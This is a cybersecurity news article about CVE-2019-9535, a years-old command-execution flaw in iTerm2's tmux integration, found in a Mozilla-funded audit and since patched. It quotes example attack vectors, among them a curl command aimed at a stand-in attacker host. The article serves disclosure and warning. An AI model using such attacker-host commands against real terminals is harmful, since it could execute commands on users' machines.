Home > Cyber News > CVE-2019-9535: 7-Year-Old Bug in iTerm2 macOS App
CYBER NEWS

CVE-2019-9535: 7-Year-Old Bug in iTerm2 macOS App

iTerm2, a well-known open-source terminal emulator macOS app, has been found vulnerable to e critical flaw, which is known as CVE-2019-9535.

The flaw was discovered during an audit sponsored by Mozilla, the company behind the Firefox browser. As for the purpose of iTerm2, the application is nearly identical to the native Terminal macOS app, and is a replacement for Terminal and the successor to iTerm.




CVE-2019-9535 – A Critical Security Vulnerability in iTerm2

A security audit funded by the Mozilla Open Source Support Program (MOSS) has discovered a critical security vulnerability in the widely used macOS terminal emulator iTerm2. After finding the vulnerability, Mozilla, Radically Open Security (ROS, the firm that conducted the audit), and iTerm2’s developer George Nachman worked closely together to develop and release a patch to ensure users were no longer subject to this security threat, said Mozilla’s Tom Ritter in a blog post detailing the issue.

The vulnerability was discovered in the tmux integration feature of iTerm2. The worst part is that it has been there for at least 7 years. It should be noted that the issue may not be that easy to exploit as it requires user interact. Nonetheless, the fact that it can be exploited by commands makes it dangerous enough.

Related: [wplinkpreview url=”https://sensorstechforum.com/5-macos-vulnerabilities-shouldnt-overlooked/”] 5 macOS Vulnerabilities that Shouldn’t Be Overlooked

In short, CVE-2019-9535 is considered a serious security issue as it could allow an attacker to execute commands on a user’s machine when they are viewing a file or receiving input crafted in iTerm2.

All users, such as developers and administrators, of iTerm2 are urged to update as soon as possible to the latest version of the app (3.3.6).

According to Ritter, “an attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer.” Attack vectors include connecting to an attacker-controlled SSH server or commands such as curl https://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will find many more creative examples, the researcher added.

The patch should be applied immediately, as it can be exploited in unknown ways, researchers warn.

Milena Dimitrova

An inspired writer and content manager who has been with SensorsTechForum since the project started. A professional with 10+ years of experience in creating engaging content. Focused on user privacy and malware development, she strongly believes in a world where cybersecurity plays a central role. If common sense makes no sense, she will be there to take notes. Those notes may later turn into articles! Follow Milena @Milenyim

More Posts

Follow Me:
Twitter

Leave a Comment

Your email address will not be published. Required fields are marked *

This website uses cookies to improve user experience. By using our website you consent to all cookies in accordance with our Privacy Policy.
I Agree